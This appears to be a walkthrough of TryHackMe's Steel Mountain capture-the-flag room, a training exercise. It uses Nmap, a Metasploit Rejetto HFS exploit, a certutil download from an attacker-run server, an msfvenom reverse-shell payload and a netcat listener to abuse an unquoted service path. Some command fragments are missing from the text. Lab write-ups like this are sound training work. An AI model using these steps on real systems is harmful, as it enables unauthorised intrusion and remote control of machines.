This walkthrough covers the Steel Mountain CTF found on TryHackMe. This room is designed to evaluate our Windows OS enumeration skills. We will utilize Metasploit to gain an initial foothold, followed by PowerShell to enumerate the machine and escalate our privileges to Administrator.
Step 1: Nmap
Note: ICMP is disabled, so we'll have to use the
nmap -Pn -p- 10.10.0.5 -vvv
PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 125 135/tcp open msrpc syn-ack ttl 125 139/tcp open netbios-ssn syn-ack ttl 125 445/tcp open microsoft-ds syn-ack ttl 125 3389/tcp open ms-wbt-server syn-ack ttl 125 5985/tcp open wsman syn-ack ttl 125 8080/tcp open http-proxy syn-ack ttl 125 47001/tcp open winrm syn-ack ttl 125 49152/tcp open unknown syn-ack ttl 125 49153/tcp open unknown syn-ack ttl 125 49154/tcp open unknown syn-ack ttl 125 49155/tcp open unknown syn-ack ttl 125 49156/tcp open unknown syn-ack ttl 125 49169/tcp open unknown syn-ack ttl 125 49170/tcp open unknown syn-ack ttl 125
From this scan, we can tell that there are two web servers, one of which will be our attack vector to get an initial foothold. Visiting the site on port 80 reveals nothing more than a static page for an employee of the month. Looking at the source code helps us identify a name, Bill Harper.
Moving on over to port 8080 proves to be a little more useful. Right off the bat, we can tell this is a user panel to an HTTP File Server.
Looking at the source code helps us narrow it down to a
Rejetto HTTP File Server. This is great news because this version is vulnerable to an RCE and Metasploit has a module for it called
Step 2: Metasploit
From here we want to search for the
rejetto module and configure the options.
After properly configuring the module and typing
exploit, we get a meterpreter session and pop a shell to grab our first flag located in
type user.txt to view it from the command line.
Step 3: Privilege Escalation
To enumerate this machine, we will use
winPEAS. You can download the latest version here.
Start a Python server:
python3 -m http.server 8000
winPEAS to the victims
C:\Users\bill\Desktop directory using
certutil.exe -urlcache -f http://10.13.28.215:8000/winPEASany_ofs.exe winPEASany_ofs.exe
Run it by typing
An interesting service called
AdvancedSystemCareService9 is missing quotes and has a space in between the application name, which means we can escape it and run a program called "
Advanced.exe" with a reverse shell.
Let's fire up
msfvenom and generate a payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o Advanced.exe
Startup a Python server and transfer the payload over using
Move it to "
C:\Program Files (x86)\IObit\", and be sure to put the file path in quotes due to the space.
Now we want to stop the
Start a netcat listener to catch the reverse shell.
nc -lvnp 1337
AdvancedSystemCareService9 service back up.
Step 4: Root
Pwned! From here we can grab the last flag found in